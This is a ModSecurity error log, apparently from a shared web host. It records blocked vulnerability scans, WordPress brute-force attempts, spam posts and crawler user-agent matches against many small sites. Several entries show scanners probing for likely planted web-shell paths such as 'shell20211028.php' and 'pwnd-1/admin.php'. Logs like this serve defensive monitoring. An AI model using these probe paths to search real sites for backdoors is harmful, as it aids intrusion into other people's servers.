[Tue May 26 18:04:40.880723 2026] [security2:error] [pid 960743:tid 960985] [client 185.192.70.95:23213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/network/network.php"] [unique_id "ahWTYPQvEln_BHBy2zJyiAAAAPU"]
[Tue May 26 18:04:42.205782 2026] [security2:error] [pid 960743:tid 960885] [client 114.119.153.50:32543] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "poonawallatennisacademy.com"] [uri "/pta/wp-content/uploads/2019/12/RadhikaKanitkar.png"] [unique_id "ahWTYvQvEln_BHBy2zJyrQAAAJE"], referer: http://poonawallatennisacademy.com/pta/wp-content/uploads/2019/12/RadhikaKanitkar.png
[Tue May 26 18:04:42.813231 2026] [security2:error] [pid 960743:tid 960947] [client 185.192.70.91:52855] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/admin/upload/css.php"] [unique_id "ahWTYvQvEln_BHBy2zJyzAAAAM8"]
[Tue May 26 18:04:43.144380 2026] [security2:error] [pid 960743:tid 960952] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTYvQvEln_BHBy2zJyyAAAANQ"]
[Tue May 26 18:04:43.464503 2026] [security2:error] [pid 960743:tid 960848] [remote 91.227.122.219:48860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTY_QvEln_BHBy2zJy2gAArmg"]
[Tue May 26 18:04:43.891188 2026] [security2:error] [pid 960743:tid 960933] [client 185.192.70.76:34507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-blog.php"] [unique_id "ahWTY_QvEln_BHBy2zJzAQAAAME"]
[Tue May 26 18:04:44.844752 2026] [security2:error] [pid 960743:tid 960987] [client 185.192.70.84:65305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/file.php"] [unique_id "ahWTZPQvEln_BHBy2zJzFgAAAPc"]
[Tue May 26 18:04:45.040439 2026] [security2:error] [pid 960743:tid 960998] [client 49.13.24.81:5332] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWTZfQvEln_BHBy2zJzHwAAAQI"], referer: https://thegoodsporting.com
[Tue May 26 18:04:45.162467 2026] [security2:error] [pid 960743:tid 960869] [remote 176.61.149.56:37612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.149.61.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWTZPQvEln_BHBy2zJzGwAA9H0"]
[Tue May 26 18:04:45.917067 2026] [security2:error] [pid 960743:tid 960991] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTZfQvEln_BHBy2zJzKAAAAPs"]
[Tue May 26 18:04:46.388693 2026] [security2:error] [pid 960743:tid 960885] [client 185.191.171.10:17994] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWTZvQvEln_BHBy2zJzOQAAAJE"]
[Tue May 26 18:04:46.388868 2026] [security2:error] [pid 960743:tid 960885] [client 185.191.171.10:17994] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWTZvQvEln_BHBy2zJzOQAAAJE"]
[Tue May 26 18:04:47.055443 2026] [security2:error] [pid 960743:tid 960915] [client 185.192.70.79:20343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 79.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahWTZ_QvEln_BHBy2zJzSQAAAK8"]
[Tue May 26 18:04:47.922171 2026] [security2:error] [pid 960743:tid 960944] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTZ_QvEln_BHBy2zJzWAAAAMw"]
[Tue May 26 18:04:48.182841 2026] [security2:error] [pid 960743:tid 960751] [remote 66.116.199.98:35986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWTZ_QvEln_BHBy2zJzZQAA_wc"]
[Tue May 26 18:04:48.675884 2026] [security2:error] [pid 960743:tid 960753] [remote 66.116.199.98:35986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWTaPQvEln_BHBy2zJzcwAAqgk"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:04:49.250424 2026] [security2:error] [pid 960743:tid 960899] [client 185.192.70.71:39225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/blocks/table/int/tmpl/index.php"] [unique_id "ahWTafQvEln_BHBy2zJzhAAAAJ8"]
[Tue May 26 18:04:49.809150 2026] [security2:error] [pid 960743:tid 960930] [client 82.76.238.33:63306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTafQvEln_BHBy2zJzlgAAAL4"]
[Tue May 26 18:04:49.809340 2026] [security2:error] [pid 960743:tid 960930] [client 82.76.238.33:63306] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTafQvEln_BHBy2zJzlgAAAL4"]
[Tue May 26 18:04:50.165971 2026] [security2:error] [pid 960743:tid 960984] [client 185.192.70.88:36087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-l0gin.php"] [unique_id "ahWTavQvEln_BHBy2zJzlwAAAPQ"]
[Tue May 26 18:04:51.084130 2026] [security2:error] [pid 960743:tid 960972] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTavQvEln_BHBy2zJzpgAAAOg"]
[Tue May 26 18:04:52.057731 2026] [security2:error] [pid 960743:tid 960974] [client 113.178.90.219:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTa_QvEln_BHBy2zJzzgAAAOo"]
[Tue May 26 18:04:52.157414 2026] [security2:error] [pid 960743:tid 960942] [client 185.192.70.84:46461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/js/jquery/suggest.php"] [unique_id "ahWTbPQvEln_BHBy2zJz2AAAAMo"]
[Tue May 26 18:04:53.076886 2026] [security2:error] [pid 960743:tid 960916] [client 185.192.70.3:32039] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/new.php"] [unique_id "ahWTbfQvEln_BHBy2zJz8QAAALA"]
[Tue May 26 18:04:53.120240 2026] [security2:error] [pid 960743:tid 960967] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTbPQvEln_BHBy2zJz5wAAAOM"]
[Tue May 26 18:04:54.340440 2026] [security2:error] [pid 960743:tid 960915] [client 185.192.70.86:47077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/pwnd-1/admin.php"] [unique_id "ahWTbvQvEln_BHBy2zJ0EwAAAK8"]
[Tue May 26 18:04:55.306970 2026] [security2:error] [pid 960743:tid 960951] [client 185.192.70.72:50397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/defaults.php"] [unique_id "ahWTb_QvEln_BHBy2zJ0LAAAANM"]
[Tue May 26 18:04:56.332887 2026] [security2:error] [pid 960743:tid 960940] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTb_QvEln_BHBy2zJ0QgAAAMg"]
[Tue May 26 18:04:56.415684 2026] [security2:error] [pid 960743:tid 960969] [client 74.7.228.9:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.docmanservices.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWTb_QvEln_BHBy2zJ0NwAAAOU"]
[Tue May 26 18:04:56.416597 2026] [security2:error] [pid 960743:tid 960875] [client 74.7.228.9:59328] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.docmanservices.freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahWTb_QvEln_BHBy2zJ0MQAAhxg"]
[Tue May 26 18:04:57.465367 2026] [security2:error] [pid 960743:tid 960922] [client 185.192.70.85:31367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/images/DJP9.php"] [unique_id "ahWTcfQvEln_BHBy2zJ0egAAALY"]
[Tue May 26 18:04:58.398857 2026] [security2:error] [pid 960743:tid 960936] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTcfQvEln_BHBy2zJ0hgAAAMQ"]
[Tue May 26 18:04:58.648635 2026] [security2:error] [pid 960743:tid 960977] [client 185.192.70.85:33985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/customize/index.php"] [unique_id "ahWTcvQvEln_BHBy2zJ0mwAAAO0"]
[Tue May 26 18:04:59.591825 2026] [security2:error] [pid 960743:tid 960985] [client 185.192.70.96:63147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/shell20211028.php"] [unique_id "ahWTc_QvEln_BHBy2zJ0rgAAAPU"]
[Tue May 26 18:04:59.819461 2026] [security2:error] [pid 960743:tid 961000] [client 185.121.232.229:60445] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.121.232.229" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWTc_QvEln_BHBy2zJ0twAAAQQ"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 18:04:59.819579 2026] [security2:error] [pid 960743:tid 961000] [client 185.121.232.229:60445] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWTc_QvEln_BHBy2zJ0twAAAQQ"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 18:05:00.215788 2026] [security2:error] [pid 960743:tid 960974] [client 82.76.238.33:63779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTdPQvEln_BHBy2zJ0vwAAAOo"]
[Tue May 26 18:05:00.215935 2026] [security2:error] [pid 960743:tid 960974] [client 82.76.238.33:63779] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTdPQvEln_BHBy2zJ0vwAAAOo"]
[Tue May 26 18:05:00.846009 2026] [security2:error] [pid 960743:tid 960943] [client 185.192.70.81:27151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/natural.php"] [unique_id "ahWTdPQvEln_BHBy2zJ0xgAAAMs"]
[Tue May 26 18:05:01.019416 2026] [security2:error] [pid 960743:tid 960956] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTdPQvEln_BHBy2zJ0xQAAANg"]
[Tue May 26 18:05:01.259130 2026] [security2:error] [pid 960743:tid 960916] [client 185.192.70.85:39295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/item.php"] [unique_id "ahWTdfQvEln_BHBy2zJ04gAAALA"]
[Tue May 26 18:05:01.632280 2026] [security2:error] [pid 960743:tid 960922] [client 185.192.70.83:62893] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/function/function.php"] [unique_id "ahWTdfQvEln_BHBy2zJ07wAAALY"]
[Tue May 26 18:05:02.070618 2026] [security2:error] [pid 960743:tid 960919] [client 185.192.70.89:61977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 89.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/SimplePie/index.php"] [unique_id "ahWTdvQvEln_BHBy2zJ09gAAALM"]
[Tue May 26 18:05:02.802108 2026] [security2:error] [pid 960743:tid 960877] [client 185.192.70.68:24807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/images/admin.php"] [unique_id "ahWTdvQvEln_BHBy2zJ1BwAAAIk"]
[Tue May 26 18:05:03.568899 2026] [security2:error] [pid 960743:tid 960977] [client 185.192.70.101:24517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/theme-compat/about.php"] [unique_id "ahWTd_QvEln_BHBy2zJ1IgAAAO0"]
[Tue May 26 18:05:03.897315 2026] [security2:error] [pid 960743:tid 960927] [client 185.192.70.4:23199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 4.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/about/function.php"] [unique_id "ahWTd_QvEln_BHBy2zJ1MgAAALs"]
[Tue May 26 18:05:04.126179 2026] [security2:error] [pid 960743:tid 960879] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTd_QvEln_BHBy2zJ1KQAAAIs"]
[Tue May 26 18:05:04.471638 2026] [security2:error] [pid 960743:tid 960874] [client 185.192.70.69:49433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/Requests/index.php"] [unique_id "ahWTePQvEln_BHBy2zJ1RQAAAIY"]
[Tue May 26 18:05:05.313000 2026] [security2:error] [pid 960743:tid 960916] [client 185.192.70.97:52429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/ID3/about.php/wp-content/x/index.php"] [unique_id "ahWTefQvEln_BHBy2zJ1WwAAALA"]
[Tue May 26 18:05:05.556078 2026] [security2:error] [pid 960743:tid 960985] [client 51.89.129.208:62582] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "bhavisharchitects.com"] [uri "/robots.txt"] [unique_id "ahWTefQvEln_BHBy2zJ1XwAAAPU"]
[Tue May 26 18:05:05.556205 2026] [security2:error] [pid 960743:tid 960985] [client 51.89.129.208:62582] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bhavisharchitects.com"] [uri "/robots.txt"] [unique_id "ahWTefQvEln_BHBy2zJ1XwAAAPU"]
[Tue May 26 18:05:06.201307 2026] [security2:error] [pid 960743:tid 960898] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTefQvEln_BHBy2zJ1ZgAAAJ4"]
[Tue May 26 18:05:06.396727 2026] [security2:error] [pid 960743:tid 960947] [client 185.192.70.72:30769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWTevQvEln_BHBy2zJ1eQAAAM8"]
[Tue May 26 18:05:06.901196 2026] [security2:error] [pid 960743:tid 960974] [client 51.222.95.253:38860] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "bhavisharchitects.com"] [uri "/"] [unique_id "ahWTevQvEln_BHBy2zJ1iAAAAOo"]
[Tue May 26 18:05:06.901325 2026] [security2:error] [pid 960743:tid 960974] [client 51.222.95.253:38860] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bhavisharchitects.com"] [uri "/"] [unique_id "ahWTevQvEln_BHBy2zJ1iAAAAOo"]
[Tue May 26 18:05:07.222554 2026] [security2:error] [pid 960743:tid 960971] [client 185.192.70.82:30825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 82.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/languages/404.php"] [unique_id "ahWTe_QvEln_BHBy2zJ1jgAAAOc"]
[Tue May 26 18:05:07.380108 2026] [security2:error] [pid 960743:tid 960999] [client 46.8.222.237:32817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.222.8.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWTe_QvEln_BHBy2zJ1jQAAAQM"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 18:05:07.380277 2026] [security2:error] [pid 960743:tid 960999] [client 46.8.222.237:32817] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWTe_QvEln_BHBy2zJ1jQAAAQM"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 18:05:08.205672 2026] [security2:error] [pid 960743:tid 960907] [client 185.192.70.93:57531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/update/403.php"] [unique_id "ahWTfPQvEln_BHBy2zJ1pQAAAKc"]
